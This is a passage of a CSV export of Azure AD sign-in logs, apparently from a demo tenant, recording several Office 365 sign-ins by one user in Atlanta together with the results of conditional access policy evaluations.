'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f8429db1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,ec85dd07-c5e8-494c-aa5b-3f8429db1600,SigninLogs,Sucess,33.7984581,-84.38828278
+1168,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:14.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2a441153-2f56-41f5-86a8-9fdaed59ba5d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f845ddc1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ec85dd07-c5e8-494c-aa5b-3f845ddc1600,SigninLogs,Sucess,33.7984581,-84.38828278
+1169,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:50.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,00c465ff-ff8b-4df2-bc71-a8ff8cf079db,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f8439e11600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,ec85dd07-c5e8-494c-aa5b-3f8439e11600,SigninLogs,Sucess,33.7984581,-84.38828278
+1170,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:21.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2561d73c-277a-4388-879d-0ea5074a8a4a,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dfda3bbc-b55b-4a89-a1fb-2fc0423c1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,dfda3bbc-b55b-4a89-a1fb-2fc0423c1300,SigninLogs,Sucess,33.7984581,-84.38828278
+1171,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:21.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,50d1469f-30f1-0000-54b3-3be4d7b3556f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f8c71dc9-cc0d-48fb-832c-2ed80b9b1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f8c71dc9-cc0d-48fb-832c-2ed80b9b1500,SigninLogs,Sucess,33.7984581,-84.38828278
+1172,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:37.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e26be625-26c8-4939-8b81-7496a2b9ca41,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",a90d7024-2f24-4b85-b726-7a30e1f51400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,a90d7024-2f24-4b85-b726-7a30e1f51400,SigninLogs,Sucess,33.7984581,-84.38828278
+1173,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:24.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,db8bea36-bed5-4498-9c5c-fc86e6f7262b,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",87802367-3de7-42c2-ada0-d6bc70891400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,87802367-3de7-42c2-ada0-d6bc70891400,SigninLogs,Sucess,33.7984581,-84.38828278
+1174,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:41.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8c8b84e-05ac-4dd5-9cb9-887df2c3b9b5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",09a9b111-0bef-49d6-ac1b-dbcd861f1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,09a9b111-0bef-49d6-ac1b-dbcd861f1800,SigninLogs,Sucess,33.7984581,-84.38828278
+1175,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:18.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7ed96c17-b233-4d6a-8b0a-d585a416572c,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, 